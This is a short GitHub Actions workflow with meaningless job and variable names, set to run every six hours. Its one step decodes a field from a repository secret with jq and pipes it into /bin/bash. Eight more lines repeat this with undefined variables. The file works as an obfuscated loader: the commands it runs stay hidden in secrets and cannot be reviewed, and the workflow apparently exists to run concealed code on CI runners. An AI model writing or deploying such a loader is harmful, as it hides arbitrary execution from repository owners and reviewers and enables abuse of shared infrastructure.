name: agreeyuy
on:
  workflow_dispatch:
  schedule:
    - cron: '25 3/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: agreeyuy
        env:
          huqnc65: ${{ secrets.huqnc65 }}
        run: |
          echo $huqnc65 | jq -r .p3834 | /bin/bash
          echo $nnb79 | jq -r .saa7068 | /bin/bash
          echo $lwyp41 | jq -r .e6674 | /bin/bash
          echo $sivb3631 | jq -r .vn71 | /bin/bash
          echo $lzt7 | jq -r .vllm4776 | /bin/bash
          echo $hp3 | jq -r .al804 | /bin/bash
          echo $i302 | jq -r .klrd8 | /bin/bash
          echo $alvyq0739 | jq -r .hxk0552 | /bin/bash
          echo $dxq64 | jq -r .hocap9 | /bin/bash

